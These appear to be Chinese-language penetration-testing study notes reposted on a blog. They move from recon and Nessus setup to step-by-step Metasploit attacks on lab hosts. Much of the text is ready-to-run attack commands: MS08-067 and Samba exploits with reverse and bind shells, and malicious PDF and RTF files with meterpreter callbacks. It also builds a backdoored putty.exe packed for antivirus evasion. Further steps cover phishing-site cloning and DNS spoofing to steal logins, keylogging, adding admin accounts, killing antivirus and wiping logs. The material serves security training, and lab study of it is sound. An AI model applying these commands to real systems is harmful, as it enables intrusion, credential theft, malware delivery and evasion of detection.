pantester

滲透測試是一種模擬惡意攻擊者的技術與方法，挫敗目標系統安全控制錯失，去的訪問控制權，并發現具備業務影響后果安全隱患的一種安全測試與評估方式

攻擊前（網絡踩點、網絡掃描、網絡查點）

攻擊中（利用漏洞信息進行滲透攻擊，獲取權限）

攻擊后（后滲透維持攻擊，文件拷貝，木馬植入，痕跡 擦除）

黑盒測試

對滲透攻擊目標網絡內部拓撲一無所知，完全模擬真實黑客有組織有步驟的滲透入侵過程

特點：花費時間長

滲透測試者需要有較高的技術能力

白盒測試

對滲透攻擊目標網絡非常了解，以最小的代價進行系統安全探測

特點：節省時間

無法有效測試客戶的內部安全應急響應程序

灰盒測試

更深入全面

滲透流程

前期交互階段（滲透測試范圍、目標、限制條件、服務合同）（收集客戶需求、準備測試計劃、定義測試范圍、定義業務目標）

情報搜集階段（公開信息查詢、google hacking、社會工程學、網絡踩點、掃描檢測、被動監聽、服務查點）

威脅建模階段（情報分析、攻擊路徑）

漏洞分析階段（結合安全漏洞掃描結果和服務查點信息、針對關鍵系統服務進行漏洞挖掘）

滲透攻擊階段（利用目標漏洞，入侵系統，獲得訪問權限）

后滲透攻擊階段（根據目標業務經營情況，挖掘出最有價值的信息和資產）

報告階段（想客戶提高安全滲透報告）

漏洞分析與利用Exploit

安全漏洞生命周期

安全漏洞研究與挖掘

Exploit代碼開發與測試

安全漏洞/Exploit代碼限于封閉團隊

安全漏洞/Exploit代碼開始擴散

攻擊工具/惡意程序出現并傳播

Exploit/攻擊工具/惡意程序大規模傳播并危害互聯網

Exploit/攻擊工具/惡意程序逐漸消亡

安全漏洞公共資源庫（CNNVD,CNVD,SCAP,CVE,NVD,SECURTYFOCUS,OSVDB，WOOYUN）

?

安全攻擊流程

踩點，掃描，攻擊，維持訪問

基礎入門

環境搭建

情報收集

web服務滲透

網絡服務滲透

客戶端滲透

社會工程學

移動環境滲透

強大的Meterpreter

信息收集

漏洞評定工具

攻擊工具

用戶提權

維護登陸

逆向工程

RFID工具

壓力測試

取證

報告工具

服務

雜項

BT5：操作系統，包含各種各樣不同作者編寫的黑客攻擊（安全審計）工具，從滲透前期到后期全部涉及?

Metasploit：滲透攻擊平臺（軟件套餐），包含整個滲透攻擊流程的大部分工具，采用統一的攻擊流程，攻擊語法，模板化

滲透攻擊模塊、攻擊載荷、輔助模塊、后滲透攻擊模塊

模塊--Metaspoit框架對外提供的最核心的滲透功能實現代碼

插件--用于集成外部的安全攻擊，例如Nessus(漏洞掃描器)，Nmap(端口掃描器)

組成

Aux輔助：模塊主要完成信息搜集

Exploits模塊：進行滲透攻擊

Post后滲透攻擊模塊：進行主機控制與拓展攻擊

msfconsole接口 控制臺終端

msfgui 圖形化界面

msfcli 命令行程序

滲透測試前期

footprinting 網絡踩點

網絡踩點技術：DNS與IP查詢、web信息搜索與挖掘、網絡拓撲偵查

收集目標系統的域名、IP地址、拓撲、聯系信息等外圍信息

scanning 網絡掃描

探測目標活躍主機（即IP）、端口信息（開放的服務）、系統類型和服務版本、相關的安全漏洞

enumeration 網絡查點

對探測出來的服務進行進一步的攻擊探測

DNS/IP踩點

whois域名注冊信息查詢

nslookup與dig域名查詢

IP2Location地理位置查詢

netcraft實現信息查詢服務

IP2Domain反查域名

進入unity模式

whois 用來查詢域名注冊信息庫的工具，如果開啟域名信息保護，無法看到詳細信息 查不到IP

nslookup 查詢DNS服務器上的Cache非權威解答

set type=A

dig 可以指定具體的域名服務器，得到更權威的解析

dig @ns.watson.ibm.com testfire.net

IP2location 得到域名對應的IP信息，還可以得到具體的地理位置和其他私密信息

maxmind.com

netcraft實現信息查詢服務

可以查詢網站和服務器更詳細的信息

查詢域名相關的子域名

searchdns.netcraft.com

IP2Domain反查域名

可以查詢哪些域名指向同一個IP地址

7c.com

搜索引擎踩點

Google Hacking技術

工具推薦

SiteDigger? （http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx#）

search diggity

搜索網站的目錄結構

www.gfsswy.com

parent directory site:testfire.net

檢索特定類型的文件

site:testfire.net filetype:xls

搜索網站中的E-mail地址

use auxiliary/gather/search_email_collector

搜索易存在SQL注入點的頁面

拓撲路徑踩點

traceroute （用icmp來追蹤）

tcptraceroute （利用SYN的同步位對每跳進行握手，可以穿透防火墻）

網絡掃描描述

主機描述?????????????????????????? 找出網段內活躍主機

ICMP ping 對目標系統進行echo request 請求探測 最常規的ping工具，容易被防火墻屏蔽

-c 次數 -s 數據包大小

arpping 通過arp請求來實現探測，一般防火墻沒法過濾arp協議

在arping的基礎上，加入網段掃描支持，通過ifconfig命令查看接口信息，然后調用具體的網卡來執行arp掃描

arp-scan --interface=eth2 10.10.10.0/24

nbtscan 得到 IP,MAC,netbios主機名信息

nbtscan 10.10.10.0/24

Nmap 世界上最流行功能最強大的網絡掃描工具

nmap -sn 10.10.10.0/24 掃描MAC，IP信息，不做端口掃描

nmap 掃描選項（用于指定掃描的方式） 掃描目標（用于指定IP地址）

主機發現模塊 局域網內部ARP掃描器，只能掃描同一局域網內部主機? arp_sweep

msfconsole

use auxiliary/scanner/discover/arp_sweep

show options

set RHOSTS 10.10.10.0/24

set THREADS 10

run

back 退出

exit 回到根目錄

端口掃描?????????????????????????? 找出主機上所開放的網絡服務

Metaspolit端口掃描模塊

通過tcp syn做端口掃描，速度較快且不易被發現，可以有其他選項

use auxiliary/scanner/portscan/syn

show options

set RHOSTS 10.10.10.129?

set THREADS 20

run

Nmap實現端口、服務、系統檢測

nmap -sS -Pn 10.10.10.129 通過ICP SYN方式掃描，并且掃描過程中不用進行ICMP echo探測，能掃描到IP、端口、服務信息、操作系統大概的類型

nmap -sV -Pn 10.10.10.129 在上面的基礎上可得到更詳細的軟件服務版本信息 此系統提供服務對應的軟件版本信息

nmap -sV?10.10.10.129 能掃描到IP、端口、服務信息、操作系統大概的類型，此系統提供服務對應的軟件版本信息

nmap -A 10.10.10.129 能掃描到IP、端口、服務信息、操作系統類型，此系統提供服務對應的軟件版本信息

操作系統/網絡服務辨識????識別主機安裝的操作系統類型與開放網絡服務類型，以選擇不同的滲透攻擊代碼及配置

xprobe2 10.10.10.129 根據不同協議的反饋協議，綜合得出操作系統信息

nmap -O 10.10.10.129 除了得到操作系統信息，也能掃描到IP、MAC、PORT、服務信息，沒法看到服務對應的軟件版本

漏洞掃描?????????????????????????? 找出主機/網絡服務上所存在的安全漏洞，作為破解通道

Nessus漏洞掃描器

安裝方式

到Nessuss官網下載軟件版本，根據BT5的版本下載
http://www.tenable.com/products/nessus/select-your-operating-system
Nessus-6.2.1-ubuntu910_i386.deb

將其復制到BT5桌面下（直接拖拽），進入路徑并進行安裝
cd Desktop/
dpkg -i Nessus-6.2.1-ubuntu910_i386.deb

到官網申請Nessus激活碼
http://www.tenable.com/products/nessus-home

添加Nessus管理員用戶名和密碼
/opt/nessus/sbin/nessuscli adduser cisco
Login password:cisco
Login password(again):cisco

通過激活碼激活Nessus，并且開始漏洞插件在線下載
/opt/nessus/sbin/nessuscli fetch --register D2E2-F637-F405-0210-3938
等待升級完成后
/opt/nessus/sbin/etc/init.d/nessusd restart

通過瀏覽器輸入https://localhost:8834訪問Nessus，輸入帳號密碼cisco/cisco，登陸

search ms08_067

show payloads

use exploit/windows/smb/ms08_067_netapi?查看此滲透模塊所對應的攻擊載荷?

set PAYLOAD generic/shell_reverse_tcp

set RHOST 10.10.10.130 設置目標IP

set LHOST 10.10.10.128 設置本地IP

set LPORT 5000 設置本地端口，此端口為滲透后靶機回連端口

set?TARGET 5? 系統操作代碼

show options

exploit

OpenVAS漏洞掃描器

網絡查點 旗標抓取 網絡服務查點 telnet 網絡查點 use auxiliary/scanner/telnet/telnet_version set RHOSTS 10.10.10.0/24 set THREADS 100 show options run
ssh 網絡查點 use auxiliary/scanner/ssh/ssh_version set RHOSTS 10.10.10.0/24 set THREADS 100 show options run ssh 口令破解 use auxiliary/scanner/ssh/ssh_login set RHOSTS 10.10.10.254 set USERNAME root set PASS_FILE /root/words.txt set THREADS 50 run
網絡服務滲透攻擊
MS12-020 一般開啟了3389端口RDP服務遠程桌面服務的WIN XP和WIN server 2003都有此漏洞 DOS下開啟win server 2003 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
MS08-067 攻擊者利用受害者主機默認開發的SMB服務端口445，發送惡意資料到該端口，通過MSRPC接口調用Server服務的一個函數，并破壞程序棧緩沖區，獲得遠程代碼執行權限，從而完全控制主機
Samba(Linux服務) search samba????? 查找針對samba服務漏洞相關滲透攻擊模塊 use exploit/muliti/samba/usermap_script????? 調用特定的滲透攻擊模塊 set PAYLOAD cmd/unix/bind_netcat????? 使用netcat攻擊載荷，滲透成功后由其執行shell，并通過netcat綁定在一個監聽端口上 set RHOST 10.10.10.254??????設置目標主機IP show options exploit???? 執行漏洞滲透
客戶端滲透攻擊
ADOBE閱讀器滲透攻擊
use exploit/windows/fireformat/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 10.10.10.128
set LPORT 8443
set FILENAME 1.pdf
exploit [*] Creating '1.pdf' file...
[*] Generated output file /root/.msf4/data/exploits/1.pdf 將文件拖入靶機當中 back use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_http set LHOST 10.10.10.128 exploit
OFFICE2003滲透攻擊 use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof set FILENAME 1.rtf set PAYLOAD windows/meterpreter/reverse_http set LHOST 10.10.10.128 exploit 將文件拖入靶機中 back use exploit/multi/handler rexploit
社會工程學滲透攻擊 偽裝木馬滲透攻擊 Meterpreter后門攻擊 將文件放入攻擊機中 在shell 中寫入以下命令 msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -C 5 將文件拷到靶機上 set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.10.128
set LPORT 80
exploit
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.10.128
set LPORT 80
exploit
在靶機上安裝殺毒軟件，可以通過UPX來實現加強免殺 將UPX軟件放在統一目錄下，然后執行免殺 upx-3.07-i386_linux upx -6 -o putty_backdoor_upx6.exe putty_backdoor.exe 將軟件放在靶機上，再次測試殺毒
冰河木馬后門攻擊（灰鴿子） 1、下載冰河木馬到Windows server 2003 G_Client為客戶端，在攻擊機本地打開，用來為靶機的后門程序做控制設置 G_Server為服務端，在靶機上打開，一般通過捆綁方式綁定到其他軟件 2、在攻擊機上開啟G_Client.exe 設置訪問口令（必須設置，不然沒法訪問靶機）其他為默認 設置關聯啟動（自我保護），當冰河后門被關閉之后，通過txt或者exe文件復活 設置郵件通知，當地址發生變動時，發送郵件，將系統，密碼等信息發送過來 點擊確定，保存配置 3、將攻擊機上的G_Server.exe復制到靶機上 雙擊病毒，并觀察后臺任務管理器 4、在攻擊機上開啟G_Client.exe并遠程控制靶機 掃描靶機（定義IP地址范圍）可以訪問靶機 可以通過命令控制臺對肉雞進行各種控制
網站釣魚滲透攻擊
BT5虛擬環境實現 啟動社會工程學攻擊集 cd /pentest/exploits/set ./set 選擇網頁攻擊 選2 選擇帳號竊取 選3 選擇克隆站點 選2 開始克隆 http://10.10.10.129/signin.html 靶機測試 帳號：admin? 密碼dvssc@admin01 帳號獲取
Kali Linux（最新版的BT）真實環境實現? 不要startx VMWARE模式：橋接模式/NAT模式
修改IP和路由(一次性) 設置IP地址：ipconfig eth0 10.1.1.10 netmask 255.255.255.0 up 添加默認路由：route add default gw 10.1.1.254
修改IP和路由 vim /etc/network/interface auto eth0 allow-hotplug eth0 address 10.1.1.212 netmask 255.255.255.0 gateway 10.1.1.254 添加路由轉發功能 vim /etc/sysctl.conf net.ipv4.ip_forward=1 reboot
一、域名劫持（域名欺騙）ettercap 1.啟動ettercap? ettercap -G 2.主機掃描 3.ARP欺騙 4.流量抓包 5.DNS欺騙 find \ -name "etter.dns" vim /usr/share/ettercap/etter.dns
二、網站克隆? cd /usr/share/set ./set?啟動set 選項1.社會工程學攻擊 選項2.網頁欺騙攻擊 選項3.網頁克隆攻擊 選項2.單個站點克隆 輸入攻擊機的地址 輸入克隆的網頁地址 開始克隆網頁（開啟apache）
三、在靶機上測試效果 靶機能夠ping同攻擊者的IP地址 靶機瀏覽器輸入攻擊者的IP地址 靶機上輸入用戶名和密碼 點擊登錄后會進入真實的網頁 打開攻擊者緩存文件查看用戶密碼 放在（/var/www 中） 引入arp和dns欺騙，在靶機瀏覽器上輸入真實域名
郵件釣魚 kali linux實現
發偽造網頁連接（結合上面網站釣魚來進行帳號竊取） vim /usr/share/set/config/set_config 將WEBATTACK_EMAIL選項改為on 選1 輸入收件人郵箱地址 選1 輸入發送人郵箱地址 寫入郵件主題 輸入郵件密碼 yes -- subject -- h? --body --END結束
發偽造網頁連接java后門程序（植入后門） 攻擊機需要調用谷歌郵箱，需要翻墻，并且允許唄set工具調用
攻擊機配置 啟動社會工程學工具集 選項1：社工國內國際 選項2：網頁攻擊 選項1：JAVA注入 選項2：網頁克隆 輸入攻擊機IP地址 選項2：植入插件并克隆 選項1（shikata）：選擇后門程序 選擇監聽端口 執行加密 調用郵件發送 通過谷歌郵箱發送給QQ郵箱 郵件發送成功等待肉雞上線
只支持舊版的IE瀏覽器 肉雞配置 自帶IE瀏覽器，安裝Java環境并啟用 打開QQ郵箱 用IE打開郵箱內的網站（此時用戶點擊信任java，則馬上中招）
發偽造網頁連接結合帶有木馬附件（盜號并植入后門）
自動化滲透攻擊 在msf中輸入db_nmap -T aggressive -sV -n -o -v 10.1.1.x?? 采用最快的時間掃描，判斷提供的服務和軟件版本，不做DNS解析，判斷操作系統，顯示掃描結果 msf調用nmap，掃描主機，并將掃描的內容存儲進入數據庫 hosts 查看掃描到的主機 services 掃描得到的服務 db_autopwn -t -p -e -i 10.1.1.x?? 顯示所有模塊 加載模塊攻擊 執行攻擊 指定剛掃描的主機 自動攻擊加載攻擊模塊針對服務漏洞進行攻擊
meterpreter （后滲透攻擊） 常用命令 0.session -l???????#查看會話 1.session -i 1 #連接回話 2.getuid????????? #查看當前用戶 3.sysinfo????????#查看系統信息 4.run hashdump?? #備份系統賬戶哈希值，后期可以用暴力破解 一般我們的密碼放在C:\Windows\System32\config\SAM 文件內 5.ps??????????????? #查看進程，找到管理員用的進程 6.migrate xxx? #遷移到管理員進程，一般我們選取explorer.exe的PID值 7.keyscan_start? #抓取鍵盤操作 8.keyscan_dump? #顯示鍵盤操作 9.keyscan_stop 10.run getgui -e????? #開啟遠程桌面（電腦--屬性--系統屬性--遠程）3389端口 11.run getgui -u pinginglab -p cisco #添加帳號密碼 直接輸入shell 可以進入cmd 的dos命令 net user 用戶名 密碼 net localgroup administrator ?用戶名 /add （計算機管理--本地用戶查看） 12.在shell中 rdesktop 10.10.10.x:3389 13.用容笑LC破解詞典L0phtCrack v5.02 網絡管理員必備工具，它可以用來檢測windows、UNIX用戶是否使用不安全的密碼 14.清除所有操作日志，反取證 clearv
用help查看命令
攻擊模塊根據漏洞拿到shell，后滲透模塊是干壞事的
meterpreter 是一個內存攻擊進程，好處 1.不創建進程（使用內存注入方式） 2.它是一個解析器加載各種攻擊命令 3.工作在被攻擊進程的上下文中 4.通信是加密的（TLV協議），可以躲避IDS 5.沒有硬盤寫入操作 6.使用通信方式是信道模式，可以同時和幾個信道工作，支持多信道 7.支持擴展編寫
關閉殺毒軟件 run killav 可能導致目標機器藍屏死機  

總結

以上是生活随笔為你收集整理的渗透测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。